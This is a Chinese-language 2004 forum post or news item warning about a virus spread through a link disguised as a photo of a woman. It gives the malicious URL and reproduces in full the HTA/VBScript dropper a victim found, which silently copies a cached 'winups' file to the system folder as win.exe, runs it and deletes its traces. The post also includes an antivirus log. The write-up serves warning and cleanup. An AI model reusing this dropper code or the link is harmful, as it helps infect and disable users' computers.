美女圖片隱藏病毒 導致多種軟體無法執行?
 

2月27日，全球反病毒監測網率先截獲一個通過圖片連接位址傳播的惡性病毒，用戶只要點擊：http://qianhui.9966.org/zhaopian/me.jpg網址，會出現一副美女圖片，有些中毒的用戶會出現殺毒軟體、OFFICE軟體、工作管理器、各種專殺工具等無法執行、且無法登入殺毒公司網址等現象。
　　據瞭解，該病毒可能是「傳奇女賊」病毒的一個最新變種，已經在網路上快速氾濫，並且有大量用戶中招，如果用戶點擊該連接則會出現一幅美女圖片，因此反病毒專家強烈建議用戶，遇到該連接位址時不要點擊。

專殺工具：http://dl.pconline.com.cn/html/1/4/dlid=12344&dltypeid=1&pn=0&.html

惡意程式碼中招...例子
一個朋友電腦上的機器一直沒昇級，今天一上網看了別人發來的網站，看了就中招了，現在連工作管理器都打不開了，哪位朋友知道如何解決的，現在已經把C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files這個目錄中的win.exe刪除了，但還是沒用。這傢伙是做的一個HTA程序，程式碼如下：

<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<HTA:APPLICATION caption="no" border="none" visiable="no" windowState="minimize" >
<ript LaNGUAGE="VBScript.Encode">
window.moveTo -100,-100
Set g_fs = CreateObject("Scripting.FileSystemObject")
Set tf = g_fs.CreateTextFile("c:\isp.hta",true)
tf.write "<HTA:APPLICATION caption=" & CHR(34)& "no" & CHR(34)& " border=" & CHR(34)& "none" & CHR(34)& " visiable=" & CHR(34)& "no" & CHR(34)& " showintaskbar=" & CHR(34)& "no" & CHR(34)& " >" &chr(13)&chr(10)
tf.write "<object id='wsh' cl"& chr(97)&"ssid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>"&chr(13)&chr(10)
tf.write "<" & "script LANGUAGE=" & CHR(34)& "VBScript" & CHR(34)& ">"&chr(13)&chr(10)
tf.write "on error resume next"&chr(13)&chr(10)
tf.write "window.moveTo -100,-100"&chr(13)&chr(10)
tf.write "window.resizeTo 0,0 "&chr(13)&chr(10)
tf.write "dim exepath"&chr(13)&chr(10)
tf.write "Function Search(objFolder) "&chr(13)&chr(10)
tf.write "Dim objSubFolder"&chr(13)&chr(10)
tf.write "For Each objFile in objFolder.Files"&chr(13)&chr(10)
tf.write "If InStr(1, objfile.name, " & CHR(34)& "winups" & CHR(34)& ", vbtextcompare) then"&chr(13)&chr(10)
tf.write "set filecp = objg_fso.getfile(objfile.path)"&chr(13)&chr(10)
tf.write "filecp.copy (exepath)"&chr(13)&chr(10)
tf.write "exit for"&chr(13)&chr(10)
tf.write "End If"&chr(13)&chr(10)
tf.write "Next "&chr(13)&chr(10)
tf.write "For Each objSubFolder in objFolder.SubFolders "&chr(13)&chr(10)
tf.write "Search objSubFolder"&chr(13)&chr(10)
tf.write "Next"&chr(13)&chr(10)
tf.write "End Function"&chr(13)&chr(10)
tf.write "Set objg_fso = CreateObject(" & CHR(34)& "Scripting.FileSystemObject" & CHR(34)& ")"&chr(13)&chr(10)
tf.write "str=WSH.regread(" & CHR(34)& "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\cache" & CHR(34)& ")"&chr(13)&chr(10)
tf.write "set tempfolder = objg_fso.getfolder(str)"&chr(13)&chr(10)
tf.write "set othisfolder = objg_fso.GetSpecialFolder(1)" &chr(13)&chr(10)
tf.write "exepath=othisfolder.path & "& chr(34) & "\win.exe" & chr(34) &chr(13)&chr(10)
tf.write "search tempfolder"&chr(13)&chr(10)
tf.write "wsh.run (exepath)"&chr(13)&chr(10)
tf.write "wsh.run " & CHR(34)& "command.com /c del c:\isp.hta" & CHR(34)& " ,0"&chr(13)&chr(10)
tf.write "window.close()"&chr(13)&chr(10)
tf.write "<" &chr(47)& "script>"&chr(13)&chr(10)
tf.close
wsh.run "c:\isp.hta",0
window.close ()
</script>
開啟後,首先是網路防火牆要求有資料要通過,禁了,跳出的頁不知道是啥,然後就是病毒防火發現了.....
掃瞄類型： 既時防護 掃瞄
事件： 已發現病毒！
病毒名稱: VBS.StartPage
文件： G:\Temporary Internet Files\Content.IE5\AP38X0JA\hello[1].hta
位置：隔離區
電腦：2K3
用戶：Administrator
採用的操作：清除 失敗 : 隔離 成功 : 拒絕訪問
發現的日期： Fri Feb 27 17:57:46 2004
http://qianhui.9966.org/zhaopian/me.jpg 這根本不是個圖片，內容如下：
一個不太好看的MM照片...好像是裝了xp sp1 ，都不會有問題






PHP程式碼:---------------------------------------------------------------------
<html>
<head>
<<img src="images/smilies/greenconfused.gif" border="0" alt="">ript language="JScript.Encode">#@~^xQEAAA==@#@&................................~@</script>
</head>
<body>
</body>
</html>